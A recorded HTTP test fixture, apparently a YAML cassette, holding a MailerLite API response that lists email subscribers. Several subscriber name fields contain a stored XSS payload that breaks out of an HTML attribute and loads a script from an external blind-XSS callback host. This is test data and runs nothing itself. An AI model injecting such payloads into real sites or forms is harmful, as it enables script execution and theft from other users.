interactions:
- request:
    body: null
    headers:
      Content-Type:
      - application/json
    method: GET
    uri: https://connect.mailerlite.com/api/subscribers?limit=10
  response:
    body:
      string: '{"data":[{"id":"141165068326798999","email":"user89999@mailerlite.com","status":"active","source":"manual","sent":0,"opens_count":0,"clicks_count":0,"open_rate":0,"click_rate":0,"ip_address":null,"subscribed_at":"2024-12-19
        16:25:00","unsubscribed_at":null,"created_at":"2024-12-19 16:25:00","updated_at":"2025-08-29
        10:23:06","fields":{"name":"''\"><script src=https:\/\/xss.report\/c\/igorhrcek><\/script>","last_name":null,"company":null,"country":null,"city":null,"phone":null,"state":null,"z_i_p":null},"opted_in_at":null,"optin_ip":null},{"id":"139802435643246056","email":"user1000@mailerlite.com","status":"active","source":"import","sent":0,"opens_count":0,"clicks_count":0,"open_rate":0,"click_rate":0,"ip_address":null,"subscribed_at":"2024-12-04
        15:26:32","unsubscribed_at":null,"created_at":"2024-12-04 15:26:32","updated_at":"2025-08-29
        10:28:18","fields":{"name":"\"><script src=https:\/\/xss.report\/c\/igorhrcek><\/script>","last_name":"\"><script
        src=https:\/\/xss.report\/c\/igorhrcek><\/script>[...]
